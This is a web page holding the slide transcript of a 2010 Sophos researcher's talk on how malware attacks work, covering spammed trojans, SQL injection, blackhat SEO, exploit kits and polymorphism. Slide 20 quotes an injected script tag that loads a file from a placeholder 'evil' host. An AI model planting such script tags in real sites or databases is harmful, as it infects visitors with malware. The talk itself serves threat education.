1 / 86

Anatomy of attack – the way of malware

Anatomy of attack – the way of malware. Vanja Svajcer Principal Researcher – Sophos Zagreb, 12 svibnja 2010. What do SophosLabs do?. Collect threats Analyze and classify Create detection and cleanup Publish updates and information R & D More details later. SophosLabs at the core.

badu
Download Presentation

Anatomy of attack – the way of malware

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Anatomy of attack – the way of malware Vanja Svajcer Principal Researcher – Sophos Zagreb, 12svibnja2010

  2. What do SophosLabs do? • Collect threats • Analyze and classify • Create detection and cleanup • Publish updates and information • R & D • More details later

  3. SophosLabs at the core

  4. Anatomy of attack • Setting the scene • Malware • Attack techniques • Analysis process & tools • Protection technology

  5. Malware types • Virus • Trojan • Worm

  6. Who used to write viruses? No “standard” virus writer, no “standard” motivation. Schoolkids Undergraduates Post-graduates IT Professionals Generally blokes but not A/V companies

  7. Who writes malware today? Rarely see viruses but they are making a comeback It is about money It is criminal in its origins ( There are still some spotty teenagers out there …)

  8. APT • Advanced Persistent Threat • Fashionable term for “targeted malware” • Small size (around 100k) and specialised • No packing • Looks like legitimate Windows file • Data exfiltration • Difficult to remove

  9. Email threats • The latter half of 2008 saw adramatic rise in emailattachment malware • 2009 has seen this trendcontinue, several families being aggressivelymass-spammed • Same old social engineering tactics • UPS/FedEx failed deliveryreports, Microsoft patches,Airline e-tickets etc etc

  10. Top spammed malware (2009) • Dominated by key malware families • Bredo • Waled • Simple butstill working!

  11. Social Engineering – Bredo Mal/Bredo • Same campaign may involve numerous “different” attachments

  12. Social Engineering – Zbot (aka Zeus) Mal/Zbot

  13. BredovsZbot • Competition between the bots!!! • Bredo attempting to disable any installed Zbot • Reminiscent of the NetskyvsBagle wars from years ago!!!

  14. Email threats • Global spam traps to track spam • USA relays more spam than any other single country • Compromised computers not only spread spam, but distribute malware and launch DDoS attacks

  15. Web predominant • 99% percent of infected systems legitimate, compromised sites • Attack sites • Botnet C&C using HTTP • Attacks still often begin with a spammed out email

  16. Web 2.0 Application Attacks

  17. Step 1: Redirect from compromised sites Compromised web sites Attacker-controlledredirects Attack site usingbundle of exploits Payload

  18. Compromising hosts

  19. SQL injection DB DB DB Malicious SQLinjection • Hacker uses tool to identify pages potentially vulnerable to SQL injection • Sends malicious HTTP request (Demo)

  20. SQL injection <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http://[evil].com/file.js • SQL injection causes databases to become peppered with malicious script tags • Result is that pages on the web server built from data retrieved from the database also contain malicious script tags

  21. SQL injection • User browses site • Malicious script tag silently loads script from remote server • Victim is infected with malware:Asprox trojan

  22. Demo SQLi + XSS

  23. Newly infected web pages – April 2010

  24. Step 2: Further redirects Compromised web sites Attacker-controlledredirects Payload

  25. SEO poisoning • Search for popular keywords

  26. Blackhat SEO

  27. Blackhat SEO

  28. Demo Blackhat SEO

  29. Visibility – sites hosting SEO kits

  30. Step 3: Load content from the attack site Compromised web sites Attacker-controlledredirects Attack site usingbundle of exploits Payload

  31. Web Attacks Built using purchased kit MPack, IcePack, GPack,Neosploit, Eleonore, Yes Management console Phishing Discovered: Oct 19th2009 • Country Hit rate: • France – 4% • US – 17% • GB – 3% • Germany – 6%

  32. Web Attacks Per-browser breakdown! Server-sidepolymorphism • Hit rate: • MSIE – 12% • FireFox – 1% • Opera – 5%

  33. Polymorphism

  34. Polymorphism

  35. Polymorphism

  36. Polymorphism

  37. Polymorphism

  38. Polymorphic malware weakness • Poly engine part of the code • Can be reversed by persistent researchers • Must be decrypted in memory • Emulate the code until the invariant is found • Detection can be based on the decryption loop

  39. Server side polymorphism

  40. Server side polymorphism

  41. Server side polymorphism

  42. Server side polymorphism

  43. Demo SSP

  44. Step 4: Hit the victim with exploits, infect them. Compromised web sites Attacker-controlledredirects Attack site usingbundle of exploits Payload

  45. Video - scareware

  46. Troj/MacSwp

  47. Zeus (Zbot) • Information stealing malware and botnet building kit • Builder • Loader • Control panel

More Related